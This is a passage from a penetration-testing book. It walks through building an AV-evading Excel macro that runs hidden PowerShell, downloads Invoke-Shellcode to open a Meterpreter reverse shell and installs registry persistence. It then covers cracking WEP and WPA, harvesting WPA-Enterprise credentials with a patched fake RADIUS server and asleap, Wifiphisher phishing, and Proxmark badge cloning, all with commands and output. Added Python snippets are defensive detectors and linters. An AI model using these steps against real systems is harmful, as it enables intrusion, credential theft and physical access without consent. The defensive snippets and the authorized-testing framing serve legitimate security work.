https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1 
Enter IP Address: 192.168.199.128 
Enter Port Number: 443 
Enter the name of the document (Do not include a file extension): records 

--Select Attack-- 
1. Meterpreter Shell with Logon Persistence 
2. Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin) 
3. Meterpreter Shell with Microsoft Outlook Email Persistence 
Select Attack Number & Press Enter: 1 

--Select Payload-- 
1. Meterpreter Reverse HTTPS 
2. Meterpreter Reverse HTTP 
Select Payload Number & Press Enter: 1 
Saved to file C:\Users\hp2\Desktop\records.xls 

Next, we need to setup our standard Meterpreter Handler: 

• cd /opt/ 

• msfconsole -r ./listener.rc 


Open up the Excel file: 

Excel Malicious File 


Here is the Macro File that was generated by the PowerShell Script: 

[Screenshot: VBA editor showing the generated macro. The VBAProject contains a module with three routines: Start, Execute and Persist. Execute uses WMI on the local machine (winmgmts:\\.\root\cimv2, a Win32_ProcessStartup object with ShowWindow = HIDDEN_WINDOW, then Win32_Process.Create) to launch powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile. Persist writes a small WScript.Shell launcher to C:\Users\Public\config.txt and then renames it to config.vbs.] 

Malicious Macro File 


When you enable the Macro, it will connect back to your Kali Meterpreter handler: 

[Screenshot: msfconsole handler output. The handler receives the staging request for the payload URI, "Meterpreter session 3 opened" from 192.168.199.1 to 192.168.199.128:443, and a "shell" command in that session spawns a Windows command prompt (Microsoft Windows Version 6.1).] 

Excel Execution - Meterpreter 



The script will also add persistence. It creates a file in C:\Users\Public\ called config.vbs. It also 
creates a registry entry under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load 
to start that vbs file upon bootup. 

So, every time this system reboots, the PowerShell script will download Invoke-Shellcode and 
connect back to your Meterpreter handler. 

Registry Persistence 


I ran these Excel files through numerous AV tools and not a single one triggered. As long as you can 
get a user to enable the Macro, you are good to go. 
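The Load value and the Public-folder .vbs are also exactly what a defender should hunt for after a phishing exercise like this one. As an added example that is not part of Generate-Macro or of this book, the Python below audits a `reg export` of the key named above (the Load value starts its program at each interactive logon of that user, and it is almost never set legitimately). The registry export embedded in the script is constructed for the example; on a real host produce one with `reg export "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" load.reg` and read it with encoding utf-16.

```python
"""Hunt for Load-value persistence: a script launcher registered under
HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load.
Works on the text of a `reg export` so it runs offline against collected
artefacts (NTUSER exports, DFIR collections)."""
import re

LOAD_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows"

# Constructed sample export of the key (not from a real host). `reg export`
# writes REG_SZ data with backslashes doubled, exactly as shown here.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"Load"="C:\\Users\\Public\\config.vbs"
"Device"="HP LaserJet,winspool,Ne00:"
"""

SUSPICIOUS_EXT = (".vbs", ".js", ".jse", ".wsf", ".ps1", ".bat", ".cmd", ".hta")
WRITABLE_DIRS = ("c:\\users\\public", "c:\\programdata", "\\appdata\\local\\temp",
                 "c:\\windows\\temp")


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the REG_SZ values in a .reg export."""
    result = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            result.setdefault(current, {})
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if m and current is not None:
            # undo the backslash doubling used inside .reg string data
            result[current][m.group(1)] = m.group(2).replace("\\\\", "\\")
    return result


def audit_load_value(reg_text):
    """Return a finding dict if Load is set, or None.

    Any Load value is worth a look (medium); a script-type launcher or a
    program living in a user-writable directory is rated high, which is the
    pattern the macro above leaves behind (C:\\Users\\Public\\config.vbs)."""
    values = parse_reg_export(reg_text).get(LOAD_KEY, {})
    load = values.get("Load")
    if not load:
        return None
    lowered = load.lower()
    finding = {"value": load, "severity": "medium", "reasons": ["Load value present"]}
    if lowered.endswith(SUSPICIOUS_EXT):
        finding["reasons"].append("script-type launcher")
        finding["severity"] = "high"
    if any(d in lowered for d in WRITABLE_DIRS):
        finding["reasons"].append("user-writable location")
        finding["severity"] = "high"
    return finding


if __name__ == "__main__":
    print(audit_load_value(SAMPLE_REG_EXPORT))
```

Because the value lives in each user's hive, run the export for every profile on the machine (or load each NTUSER.DAT) rather than only for the account you are logged on as; the same check applies to the matching Run value under the same key.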


Phishing Reporting 


As stated many times throughout this book, the most important part of any test is reporting. I have 
linked a sample phishing report that you can use as a template. 

• Work with the security team to figure out how many users reported the phish 

• Record information that includes how many users clicked/opened the attachment and 
how many conversions (i.e. entered password/executed malicious files) 

• Identify if the security team would have been notified by their users if this had been 
a real attack 

• Since every social engineering attack is very different, a section should include 
reasons for successes or failures 

• Remediation plan or areas to improve results 


I haven't seen many public templates for phishing campaigns, but I have 
included a sample report at: 
http://thehackerplaybook.com/Download/2015_RT_Phishing_SUCK_REPORT.pdf 

The Onside Kick - Attacks That Require Physical Access 


The onside kick is a dangerous tactic that can provide huge results. The problem with these 
types of attacks is that they generally require close proximity and have a high potential of alarming your 
victim. In this chapter, I will cover exploiting wireless networks, cloning cards, building a 
penetration drop box, and dropping USB sticks. Please remember, if you are going to do these types 
of attacks, get written approval from the company with which you are working. 


Exploiting Wireless 

Before we begin talking about exploiting wireless, I want to state that many of the basic attacks for 
WIFI haven’t changed from the previous book. To eliminate the need to carry two books, I have 
included the relevant WIFI material from the last book along with the newer attacks. 


I am often asked what the best card is for wireless sniffing and attacking. I don't have an exact 
technical comparison, but from my experience, I have had the most success and luck with the Alfa 
AWUS036NHA.{31} This USB wireless adaptor supports 802.11 a/b/g/n and works natively with 
Backtrack and Kali. This card also uses the Atheros chipset, of which I am a big fan. The reason that 
I use a USB wireless card is that my Kali system is generally a VM, which can't utilize the native 
built-in wireless card. 


Passive - Identification and Reconnaissance 

Passive WIFI testing puts the WIFI card in a sniffing mode to identify access points, clients, signal 
strengths, encryption types, and more. In a passive mode, your system will not interact with any of the 
devices, but this mode is used for recon/identification. 

To start any WIFI assessment, first kick off Kismet. Kismet is a great WIFI tool to sniff, identify, and 
monitor wireless traffic. At any terminal window in Kali, type: 

• kismet 


This will open the Kismet application, which will need your wireless interface information (you can 
do a quick ifconfig in a separate terminal window to find this information). In this case, my wireless 
interface is wlan1. 


If everything works properly, you can close that window (try pressing the tab button if you are stuck) 
and you will see a listing of all the SSIDs, channels, signal strength, and more. 



SSIDs and AP information 


The colors of the different wireless networks represent the following: 

• Yellow - Unencrypted Network 

• Red - Factory default settings in use 

• Green - Secure Networks (WEP, WPA, etc.) 

• Blue - SSID cloaking on / Broadcast SSID disabled{32} 
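
The colour legend above is a triage done by eye. As an added example (not Kismet's code or the book's), here is the same triage done programmatically over an airodump-ng CSV export, which is assumed as the input because its column layout is stable and text-based. The CSV rows are constructed sample data, not a real survey, and the factory-default SSID list is a small illustrative set (Kismet uses its own, much longer manufacturer list). It goes one step beyond the legend by splitting WEP out of the "secure" bucket, since the WEP section that follows shows why it does not belong there.

```python
"""Passive wireless audit: parse the access-point section of an airodump-ng
CSV and put each network in a Kismet-style bucket."""
import csv

# Constructed airodump-ng style export (the column names are airodump-ng's;
# the rows are sample data, not a real survey).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:01, 2015-03-01 10:00:00, 2015-03-01 10:05:00,  6,  54, WEP, WEP, , -60, 120, 3400,   0.  0.  0.  0,   6, Rocket, 
00:11:22:33:44:02, 2015-03-01 10:00:01, 2015-03-01 10:05:00, 11,  54, OPN, , , -70,  80,    0,   0.  0.  0.  0,   5, Guest, 
00:11:22:33:44:03, 2015-03-01 10:00:02, 2015-03-01 10:05:00,  1,  54, WPA2, CCMP, PSK, -55, 200,    0,   0.  0.  0.  0,   7, linksys, 
00:11:22:33:44:04, 2015-03-01 10:00:03, 2015-03-01 10:05:00, 36, 300, WPA2, CCMP, MGT, -40, 150,    0,   0.  0.  0.  0,   0, , 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Small illustrative list of out-of-the-box SSIDs; extend from your own inventory.
DEFAULT_SSIDS = {"linksys", "dlink", "netgear", "default", "belkin54g", "wireless"}


def parse_access_points(text):
    """Return the AP rows as dicts; the blank line before the station table ends the section."""
    rows, header = [], None
    for line in text.splitlines():
        if not line.strip():
            if header:
                break
            continue
        fields = [f.strip() for f in next(csv.reader([line]))]
        if header is None:
            header = fields
            continue
        rows.append(dict(zip(header, fields)))
    return rows


def classify(ap):
    """Map one AP row to (bucket, reason), mirroring the Kismet colours:
    unencrypted (yellow), factory-default (red), secure (green), cloaked (blue),
    plus a 'weak' bucket for WEP that Kismet lumps in with secure."""
    privacy = ap["Privacy"].upper()
    essid = ap["ESSID"]
    if ap["ID-length"] == "0" or not essid:
        return "cloaked", "SSID broadcast disabled"
    if essid.lower() in DEFAULT_SSIDS:
        return "factory-default", "SSID matches a vendor default name"
    if privacy == "OPN" or not privacy:
        return "unencrypted", "no encryption advertised"
    if "WEP" in privacy:
        return "weak", "WEP is broken; treat as unencrypted"
    if ap["Authentication"] == "PSK":
        return "secure", "WPA/WPA2 pre-shared key"
    return "secure", "WPA/WPA2 enterprise (802.1X)"


def audit(text):
    """Return {bssid: (bucket, reason)} for every AP in the capture."""
    return {ap["BSSID"]: classify(ap) for ap in parse_access_points(text)}


if __name__ == "__main__":
    for bssid, (bucket, reason) in audit(SAMPLE_CSV).items():
        print(bssid, bucket, "-", reason)
```

Feed it the `-w prefix` CSV that airodump-ng writes (prefix-01.csv) and compare the result against your list of sanctioned BSSIDs; anything in the unencrypted, weak or factory-default buckets, or a BSSID you do not own, is the starting point for a rogue-AP investigation.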


After selecting an SSID, you will immediately see information about that Access Point such as the 
BSSID, manufacturer, type of encryption (in this 

case WEP), and signal strength/packet loss. This is great for identifying where an access point is 
located and how we are going to attack it. 


By pressing the ~ (tilde) key, the V key, and then the C key, you will see all the clients that are 
connected to this access point. 




[Screenshot: Kismet Network Details view with the Clients panel open, showing Signal Level, Packet Rate and Retry Rate for the selected network (Name: drunk).] 

Finding Clients Connected to an AP 

This is useful when doing de-authentication attacks or denial of service attacks against the access 
point in the Active Attacks section. 

Active Attacks 



After you identify the networks you are to attack or networks that are within scope of your 
assessment, you need to figure out which active attacks to use. We are going to focus on four main 
types of attacks: those against WEP, WPAv2, WPA WPS, and WPA Enterprise. 

One thing I want to reiterate is that we are going for the quickest and easiest way to crack wireless 
passwords or gain access to a wireless infrastructure. There are many different tools to attack WIFI 
(aircrack-ng, http://www.aircrack-ng.org/, is one of my favorites), but I will focus on getting the job 
complete. 


WEP - Wired Equivalent Privacy 

We should all know by now that using WEP for wireless networks is insecure. I won't go into the 
details, but if you want to read about how it was implemented and configured improperly, you can 
visit the Wikipedia page: 

http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy . 






If the organization is utilizing WEP and has at least one client, you should be able to crack the WEP 
password without an issue. 


To accomplish this, we are going to use the Fern-Wi-Fi-Cracker tool to identify WEP networks and 
attempt to crack them. I am using Fern-Wi-Fi-Cracker because it is native to Kali and utilizes 
Aircrack-ng (which is my favorite Wi-Fi tool). One quick caveat: for the example below, the access 
point you are attacking needs to have at least one active host on that network. There are ways to get 
around this (search Newsham's Attack), but I won't go over them in this book because the following 
attack is the most common situation you will run into. 


How to Crack WEP in Kali: 

• At a command prompt, type: 

o fern-wifi-cracker 

• Select the drop down and pick your Wi-Fi (most likely wlan0) 

• Click the Scan button 

• And drop into WEP (the red Wi-Fi sign) 



Fern WIFI Cracker 


• Select the SSID you want to attack (in this case, Rocket) 

• Click on Wi-Fi Attack on the right side 

• Watch the IV count. You will need at least 10k IVs to crack the password 

• If it is successful, you will see the WEP key below 






WEP Key Cracking 


Now you can connect to that SSID, and you are on that network. 

WPAv2 (TKIP) - Wi-Fi Protected Access 

WPAv2 doesn't have a vulnerability like WEP, so cracking the password is much more difficult. To 
have a successful attack, you need to capture the authentication handshake from a client to the access 
point. To cheat in this process, we can force a user to de-authenticate and then re-authenticate. Once 
we capture the handshake, we won't be able to just strip the password out; we will have to brute-force 
or crack the password. Let's see this in progress. 


Before we can start sniffing, we need to enable the capture file settings within Fern-WiFi-Cracker, so 
that the handshake file can be used for cracking. 

• At a command prompt, type: 

o fern-wifi-cracker 

• Go to the ToolBox 

• Click on the WIFI Attack Options 

• Select Capture File Settings 









[Screenshot: Fern WIFI Cracker Toolbox, WIFI Attack Settings dialog. Sections: Default MAC Settings; Capture file settings (enabled) with "Set directory for storing capture files for offline use" pointing at /root/Desktop; Cookie Hijacker; Font Settings; the installed aircrack and Qt versions; and the About Fern WIFI Cracker panel.] 

Enabling Capture File Settings 


• Hit ESC until you are back at the home screen of Fern-Wifi-Cracker 

• Select the drop down and pick your Wi-Fi (most likely wlan0) 

• Click the Scan button 

• And drop into WPA (the blue Wi-Fi sign) 

• Select your SSID to attack 

• Click on WIFI Attack 

• In the following image, you will see the cap file created 

WPA Handshake Capture 


We need to first clean the cap file to make sure it will work with our password cracker. This can be 
accomplished with wpaclean: 

• wpaclean <out.cap> <in.cap> 


Please note that the wpaclean arguments are <out.cap> <in.cap> instead of <in.cap> <out.cap>, 
which may cause some confusion. {33} 

To crack the WPA handshake, we need to convert the clean cap file into an hccap file. We are going 
to do this with aircrack-ng: 

• aircrack-ng <out.cap> -J <out.hccap> 

• Note that the -J is an upper case J and not a lower case j. 








:~/Desktop# wpaclean out.cap belkin.cba_Capture_File\(WPA\).cap 
Pwning belkin.cba_Capture_File(WPA).cap (1/1 100%) 
Net 94:44:52: belkin.cba 
Done 

:~/Desktop# aircrack-ng out.cap -J out.hccap 
Opening out.cap 
Read 3 packets. 

   #  BSSID              ESSID                     Encryption 

   1  94:44:52:          belkin.cba                WPA (1 handshake) 

Choosing first network as target. 

Opening out.cap 
Reading packets, please wait... 
Building Hashcat (1.00) file... 

[*] ESSID (length: 10): belkin.cba 
[*] Key version: 2 
[*] BSSID: 94:44: 
[*] STA: 20:C9:D0: 
[*] anonce: 

Cleaning WPA Files 


This will give you the file that you feed into oclHashcat. Remember that the only way to get 
the password for WPAv2 is to brute-force the password. To see how to accomplish WPAv2 hccap 
password-cracking, go to the Cracking WPAv2 with oclHashcat section below. 
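
Before spending GPU time on a handshake, it helps to confirm that the hccap file actually contains the fields aircrack-ng lists above. The parser below is an added example, neither aircrack-ng's nor hashcat's code; it reads hashcat's documented 392-byte hccap record (essid, AP MAC, station MAC, two nonces, the EAPOL frame with its length, the key version, and the MIC). The sample record is constructed in memory with placeholder MACs, nonces and EAPOL bytes, not the belkin.cba capture from the page.

```python
"""Decode and sanity-check a hashcat hccap record (the file aircrack-ng -J writes)."""
import struct

# hashcat's hccap layout: essid[36] mac1[6] mac2[6] nonce1[32] nonce2[32]
# eapol[256] eapol_size(int) keyver(int) keymic[16]  ->  392 bytes, no padding
HCCAP_STRUCT = struct.Struct("<36s6s6s32s32s256sii16s")
assert HCCAP_STRUCT.size == 392


def _mac(raw):
    return ":".join("%02x" % b for b in raw)


def parse_hccap(data):
    """Decode the first hccap record in `data` into a dict; raises ValueError on bad sizes."""
    if len(data) % HCCAP_STRUCT.size:
        raise ValueError("hccap length %d is not a multiple of 392" % len(data))
    essid, mac1, mac2, nonce1, nonce2, eapol, eapol_size, keyver, keymic = \
        HCCAP_STRUCT.unpack(data[:HCCAP_STRUCT.size])
    if not 0 < eapol_size <= 256:
        raise ValueError("eapol_size %d out of range" % eapol_size)
    return {
        "essid": essid.split(b"\x00", 1)[0].decode("utf-8", "replace"),
        "bssid": _mac(mac1),          # mac1: access point
        "sta": _mac(mac2),            # mac2: station (client)
        "snonce": nonce1.hex(),       # hashcat documents nonce1 as the station nonce
        "anonce": nonce2.hex(),       # and nonce2 as the AP nonce
        "eapol": eapol[:eapol_size],  # the EAPOL-Key frame the MIC was computed over
        "keyver": keyver,             # 1 = WPA (HMAC-MD5), 2 = WPA2 (HMAC-SHA1)
        "keymic": keymic.hex(),
    }


def build_hccap(essid, bssid, sta, anonce, snonce, eapol, keyver, keymic):
    """Pack one record; used here only to construct sample input."""
    return HCCAP_STRUCT.pack(essid.encode(), bytes.fromhex(bssid.replace(":", "")),
                             bytes.fromhex(sta.replace(":", "")), snonce, anonce,
                             eapol.ljust(256, b"\x00"), len(eapol), keyver, keymic)


def handshake_looks_complete(rec):
    """Checks worth running before trusting a 'captured handshake': a non-empty
    ESSID, a known key version, both nonces and the MIC present, and an EAPOL frame."""
    return (bool(rec["essid"]) and rec["keyver"] in (1, 2)
            and rec["anonce"] != "00" * 32 and rec["snonce"] != "00" * 32
            and rec["keymic"] != "00" * 16 and len(rec["eapol"]) > 0)


# Constructed sample handshake: placeholder addresses and counter-pattern bytes,
# not real key material and not the capture shown on the page.
SAMPLE_HCCAP = build_hccap("TestNet-Example", "00:11:22:33:44:55", "66:77:88:99:aa:bb",
                           anonce=bytes(range(1, 33)), snonce=bytes(range(33, 65)),
                           eapol=b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 113,
                           keyver=2, keymic=bytes(range(16)))

if __name__ == "__main__":
    rec = parse_hccap(SAMPLE_HCCAP)
    print(rec["essid"], rec["bssid"], rec["sta"], "keyver", rec["keyver"],
          "complete" if handshake_looks_complete(rec) else "INCOMPLETE")
```

Run `parse_hccap(open("out.hccap", "rb").read())` on the file aircrack-ng produced; an all-zero nonce or MIC means wpaclean kept a partial exchange and the cracker would be wasting its time.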


WPAv2 WPS (Wi-Fi Protected Setup) Attacks 

WPS (originally known as Wi-Fi Simple Config) was created to make it simple to establish a secure 
connection to a wireless router/access point. {34} All you need to do is to enter a PIN when 
connecting to an access point without knowing the long complex password. The issue stems from the 
fact that the PINs required could be brute-forced relatively quickly. {35} What's even better is that on 
some access points you cannot disable WPS even if you turn it off in the configuration page. As you 
saw previously with Kismet, the manufacturer of the device can be identified via passive sniffing. 
Here is a Google document that lists a large number of vulnerable devices and the tools that could be 
used to attack WPS: 
http://bit.lv/ leRNOq; . 


The steps to attack WPS are similar to WPAv2, but instead of a Regular Attack, pick the WPS Attack 
and wait for the results. The same Google document just referenced gives the estimated time it would 
take to attack that specific device. 





WPA Enterprise - Fake Radius Attack 

One of my favorite attacks for enterprise environments is the fake radius attack. The problem with 
WPAv2 Enterprise networks is that all the normal WEP/WPAv2 TKIP type attacks do not work. To 
get around this, Josh Wright developed a method to capture username/password combinations for 
WPAv2 Enterprise-grade wireless using a radius server. {36} 


Configuring a Radius server 

To configure your Radius server, we need to download and modify it. Download the Radius software 
(research, concept, and code originated from 
http://www.willhackforsushi.com/presentations/PEAP_Shmoocon2008_WrightAntoniewicz.pdf): 

• wget ftp://ftp.freeradius.org/pub/freeradius/old/freeradius-server-2.1.12.tar.bz2 

• tar xfj freeradius-server-2.1.12.tar.bz2 

• cd freeradius-server-2.1.12 

• wget http://willhackforsushi.com/code/freeradius-wpe-2.1.12.patch 

• We next need to patch our Radius server: 

o patch -p1 < freeradius-wpe-2.1.12.patch 
o ./configure && make && make install 

• We need to edit the configuration (the client IP and shared secret are whatever your access point will use): 

o cat >> clients.conf <<EOF 
o client 192.168.1.1 { 
o secret = mysecret 
o } 
o EOF 

• radiusd -X 

• In a separate terminal: 

o tail -f /usr/local/var/log/radius/freeradius-server-wpe.log 










Example Output: 

mschap: Fri Jun 7 02:19:39 2013 
username: admin 
challenge: 07:50:2a:b7:a6:4d:24:d1 
response: fc:9d:19:06:c0:79:c3:f5:ad:db:6b:79:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08 

mschap: Sat Jun 8 23:02:39 2013 
username: user1 
challenge: 34:ab:10:95:62:52:85:40 
response: 9e:0c:e7:80:06:2f:a0:0b:c3:d7:c7:d7:c6:38:ec:0a:e5:a3:57:8c:33:2c:8e:0f 

mschap: Sat Jun 8 23:28:43 2013 
username: test 
challenge: 12:ea:f1:24:f5:4b:e8:7e 
response: be:17:da:45:c0:88:ed:9c:eb:c9:5c:38:b8:1f:3e:8f:90:cd:17:16:ad:87:b3:ed 

Once you capture the challenge/response and username for the authentication request, you can move 
on to prepping the password lists. Before you can crack the passwords, you need to convert a word 
list into the format the Asleap application uses to brute-force passwords. This can be accomplished 
with the following command, which converts the darkc0de password list into the two files Asleap needs: 

• genkeys -r darkc0de.lst -f words.dat -n words.idx 


Asleap is a tool used to recover LEAP and PPTP type passwords from a captured challenge/response, using 
the word list and index produced by genkeys. Asleap takes the challenge and response as demonstrated below. 

root@bt:~/wireless# asleap -f words.dat -n words.idx -C 07:50:2a:b7:a6:4d:24:d1 -R fc:9d:19:06:c0:79:c3:f5:ad:db:6b:79:59:2f:7f:6e:d8:05:19:c4:5d:26:30:08 
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> 
hash bytes: 0157 
NT hash: 5e7599f673df11d5c5c4d950f5bf0157 
password: hacker 

In the example above, we were able to crack the challenge/response hash for a WPA-Enterprise 
authentication. Now, take these credentials and log back into their wireless network. 
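
The fake-RADIUS attack works because the client never verifies that it is talking to the corporate RADIUS server, so it happily runs MSCHAPv2 inside a TLS tunnel terminated by the attacker. As an added example from the defender's side (not freeradius-wpe's, asleap's or this book's code), the Python below lints a wpa_supplicant.conf EAP profile for the settings that close that gap. `ca_cert`, `domain_suffix_match`, `anonymous_identity`, `phase2` and `key_mgmt` are real wpa_supplicant keys; the SSID, identity, password and certificate path in both profiles are constructed placeholders.

```python
"""Lint wpa_supplicant EAP (802.1X) network blocks for settings that let a rogue
RADIUS server harvest MSCHAPv2 challenge/responses."""
import re

# Constructed: a typical "just make it connect" profile with no server validation.
WEAK_CONF = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
}
"""

# Constructed: the same profile pinned to the organisation's CA and RADIUS host name.
HARDENED_CONF = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jsmith"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-root-ca.pem"
    domain_suffix_match="radius.example.com"
    anonymous_identity="anonymous@example.com"
}
"""


def parse_networks(conf):
    """Return a list of {key: value} dicts, one per network={...} block."""
    networks = []
    for body in re.findall(r"network=\{(.*?)\}", conf, re.S):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip().strip('"')
        networks.append(entry)
    return networks


def lint_eap_network(net):
    """Return the problems found in one network dict (empty list = acceptable)."""
    problems = []
    if net.get("key_mgmt") not in ("WPA-EAP", "WPA-EAP-SHA256"):
        return problems  # PSK or open network: the RADIUS checks do not apply
    tunnelled_mschap = (net.get("eap") in ("PEAP", "TTLS")
                        and "MSCHAPV2" in net.get("phase2", "").upper())
    if "ca_cert" not in net:
        problems.append("no ca_cert: any server certificate is accepted")
        if tunnelled_mschap:
            problems.append("MSCHAPv2 inner auth exposed to offline cracking "
                            "(asleap-style) by a rogue RADIUS server")
    if "domain_suffix_match" not in net and "subject_match" not in net:
        problems.append("no domain_suffix_match: any certificate from that CA is accepted")
    if "anonymous_identity" not in net:
        problems.append("no anonymous_identity: real username sent in the clear outer identity")
    return problems


def lint_conf(conf):
    """Lint every EAP network in a config; returns {ssid: [problems]}."""
    return {n.get("ssid", "?"): lint_eap_network(n) for n in parse_networks(conf)}


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, lint_conf(conf))
```

The equivalent on Windows is the PEAP profile's "Validate server certificate" setting together with the trusted root CA and the expected server name; pushing that profile by group policy, not cracking resistance, is what stops the attack described above.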


Wifite 

(https://github.com/derv82/wifite) (Kali Linux) 

Wifite is another WIFI attacking tool that I highly recommend using. With similar functionality to fern-
wifi-cracker, Wifite is another GUI front end to Aircrack-ng and Reaver. In certain cases, I found 
Wifite to work better than my other tools. To start Wifite: 

• cd /opt/wifite 

• python ./wifite.py 




Once you have wifite.py running, it automatically starts scanning the networks for access points. In the 
image below, we identify a WEP network with an ESSID of "me". 

[Screenshot: terminal at root@kali:/opt/wifite showing the Wifite scan results.] 

Wifite Example 


Once you have identified a target, press “CTRL-C” and pick the value of the ESSID you want to 
attack. In this case, we will attack ESSID number 5. Once selected, this will kick off the WEP attack 
to capture and crack IVs. 


[+] 1 target selected. 

[0:10:00] preparing attack "me" (84:C9:46:4F) 
[0:10:00] attempting fake authentication [1/5]... success 
[0:10:00] attacking "me" via arp-replay attack 
[0:07:37] started cracking (over 10000 ivs) 
[0:06:39] captured [illegible] ivs @ 243 iv/sec 
[0:06:39] cracked me (84:C9:46:4F)! key: "714 
[+] 1 attack completed: 

Successful Attack 


That’s pretty much it. Even better, if the access point isn’t vulnerable to WEP attacks, but is 
vulnerable to WPS and utilizes WPAv2, Wifite will kick off Reaver to attack WPS. If that is 
unsuccessful, it will attack WPA by disassociating clients and capturing the authentication handshake. 


WifiPhisher 

(https://github.com/sophron/wifiphisher.git) (Kali Linux) 

Wifiphisher is a security tool that mounts fast, automated phishing attacks against WiFi networks in 
order to obtain secret passphrases and other credentials. It is a social engineering attack that, unlike 
other methods, does not include any brute forcing. It is an easy way of obtaining credentials from 
captive portals and third party login pages or WPA/WPA2 secret passphrases. {37} 







I love seeing creative WIFI type attacks. This is nothing new in terms of standing up a cloned SSID, 
deauthing users, and cloning pages, but Wifiphisher puts all these attacks together in an easy-to-use 
script. You do need to make sure that you have two USB WIFI network cards installed. 


• cd /opt/wifiphisher/ 

• python ./wifiphisher.py 


Wifiphisher will stand up a couple of web servers and clone an access point of your choice. 

[Screenshot: terminal at root@kali:/opt/wifiphisher showing "[*] Starting the fake access point..."] 

Wifiphisher 


It will deauth all other users and when they reconnect to our access point, no matter what page they 
visit, they will be redirected to our malicious page. The default page is a router web admin page, but 
we can just as easily use SET from our social engineering section and create a clone page of our 
choice. 

[Screenshot: the cloned router page - "DOWNLOAD AND UPGRADE: Current Firmware Version: 1.04", a "WPA Password" field and a Submit button.] 

Fake Authentication Page 


Another more manual approach to the same idea is the infernal-twin: 
https://github.com/entropy1337/infernal-twin 


Feel free to play around with these attacks, develop those that work best for your environment and 
customize them. 


Badge Cloning 


The standard in HID badge cloning is the Proxmark 3.{38} Although this RFID tag reader/writer is a 
little pricey ($400+), it is a must have. It is important to understand frequency and card types. The kit 
from the HackerWarehouse comes with the following: 

• Low Frequency Antenna - Tuned to operate at 125 kHz and 134 kHz and is capable 
of reading proximity cards at a distance of 4 cm. 

• High Frequency Antenna - Tuned to operate at 13.56 MHz and is capable of 
snooping the UID of a Mifare 1K Classic card at a distance of 3 cm. 

• Tag bundle - Includes three types of RFID tags: T5557 (EM4100, HID and Indala 
compatible, 125 kHz) read/write card, Mifare 1K (13.56 MHz) test card, and EM4100 
(125 kHz) test card. 

• Prox Box 


The most common HID badge card I see is the ProxCard II. This card has been around for a long time 
due to the low cost and ease of use, and is commonly seen in small/medium size companies. Many 
companies that rent space from a shared office building usually do not have a choice in which card 
their building uses. This also means these types of cards won’t be going away anytime soon. 
Penetration testers love the ProxCard II because it does not have any encryption or require 
challenge/response authentication by default. 

Some companies use high frequency cards like Mifare, which use crypto; however, even these have 
been found to be vulnerable. {39} In this demonstration, we will focus on the ProxCard II. 




Proxmark3 


Out of the box, the Proxmark3 will need to be updated. I won't go through every step, but a great 
place to get you started is located here: 
https://github.com/Proxmark/proxmark3/wiki/Windows 


I did have some issues trying to get the Proxmark3 to work. So, I have included my notes to help you 
get through the troubleshooting process. 


After the initial driver installation located in section - UPDATE PROXMARK TO THE NEW CDC 
Serial INTERFACE: 

• After I did FLASH New Bootrom in procedure 2 and let go of the Proxmark button, it 
still only showed up under libusb-Win32 device instead of on a COM port. 

• I first followed the WINDOWS PROBLEMS IN RECOGNIZING COM PORT 
section to update the drivers while the button was pushed. 

• After completing that, I let go of the button, unplugged again, pushed the button, 
replugged in, the COM port showed up (only while the button is pushed), and I went ahead 
and updated the FLASH - Bootrom.bat, FLASH - FPGA fullimage.bat, and FLASH - 
OS.bat. After that, I let go of the button and everything worked like a charm. Now, if 
everything is working, run: proxmark3.exe [comport] 


There are many proxmark3 commands {40}, but we will go through the ones that matter. 

• lf hid fskdemod - Realtime HID FSK demodulator (Read HID tags) 

• lf hid clone - Clone HID to T55x7 (Write Tag ID) to a blank card 


1. First put the Proxmark3 into listener mode. Any card that is within an inch of the reader will 
show its HID tag ID. 

2. After we remove the HID card we want to clone, we are going to configure the Proxmark3 to 
write back to a blank card. Put the blank card on the antenna and use the command "lf hid clone 
[TAG ID]" to write to that card. 

3. We need to verify that we wrote to that card by putting the Proxmark3 back in listener mode and 
making sure our new cloned card has the proper HID tag ID. 


[Screenshot: Proxmark3 client session in a MINGW32 shell on Windows; the readable part of the output is:] 

proxmark3.exe com4 
proxmark3> lf hid fskdemod 
#db# TAG ID: 2004520045 (26326) 
#db# TAG ID: 2004520045 (26326) 
#db# TAG ID: 2004620046 
#db# TAG ID: 2004520045 (26326) 
#db# Stopped 
proxmark3> lf hid clone 2004520045 
Cloning tag with ID 2004520045 
#db# DONE! 
proxmark3> lf hid fskdemod 
#db# TAG ID: 2004520045 (26326) 
#db# TAG ID: 2004520045 (26326) 
#db# TAG ID: 2004520045 (26326) 

Proxmark3 - Badge Cloning 


Once you have your device configured, you can connect the external battery back to the Proxmark3, 
however, you can only clone one badge at a time. To get around this problem and the battery pack 
